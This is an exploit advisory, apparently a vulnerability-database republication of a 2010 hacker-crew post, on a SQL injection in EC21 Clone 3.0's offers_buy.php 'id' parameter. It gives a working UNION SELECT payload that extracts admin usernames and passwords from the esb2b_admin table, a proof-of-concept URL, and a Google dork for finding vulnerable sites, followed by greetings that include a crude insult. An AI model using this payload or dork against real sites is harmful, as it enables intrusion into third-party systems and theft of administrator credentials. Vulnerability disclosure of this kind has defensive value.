EC21 Clone 3.0 (id) SQL Injection Vulnerability

2010-05-06 / 2010-05-07
Credit: v3n0m
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

) ) ) ( ( ( ( ( ) ) ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /( )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\()) ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\ __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ / \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' < |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\ .WEB.ID ----------------------------------------------------------------------- EC21 Clone 3.0 (id) SQL Injection Vulnerability ----------------------------------------------------------------------- Author : v3n0m Site : http://yogyacarderlink.web.id/ Date : April, 30-2010 Location : Jakarta, Indonesia Time Zone : GMT +7:00 ---------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : EC21 Clone Vendor : http://www.alibabaclone.com/ Price : $499 USD Google Dork : allinurl:offers_buy.php?id= Overview : B2B trading Marketplace Script clone of alibaba Marketplace script is a wonderful solution to launch your own business to business and b2c site. Script is packed with lot of features to provide a very sound foundation to your trading portal site. ---------------------------------------------------------------- Exploit: ~~~~~~~ -9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin-- SQLi p0c: ~~~~~~~ http://127.0.0.1/[path]/offers_buy.php?id=[SQLi] ---------------------------------------------------------------- Shoutz: ~~~~ - 'malingsial banyak cakap, you skill off bullshit on ' - LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi- - setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag - kiddies,whitehat,mywisdom,yadoy666,udhit - c4uR (ah payah c4uR dipeser cengeng bruakakaka) - BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers) - Chip D3 Bi0s & LatinHackTeam (Good Job & Good Research Brotha ;) - elicha cristia [ luv You...luv You...luv You... :) ] - N.O.C & Technical Support @office "except ahong (fuck you off)" - #yogyacarderlink @irc.dal.net ---------------------------------------------------------------- Contact: ~~~~ v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com Homepage: http://yogyacarderlink.web.id/ http://v3n0m.blogdetik.com/ http://elich4.blogspot.com/ << Update donk >_< ---------------------------[EOF]--------------------------------

References:

http://xforce.iss.net/xforce/xfdb/58266
http://www.securityfocus.com/bid/39832
http://www.exploit-db.com/exploits/12459
http://packetstormsecurity.org/1004-exploits/ec21clone-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top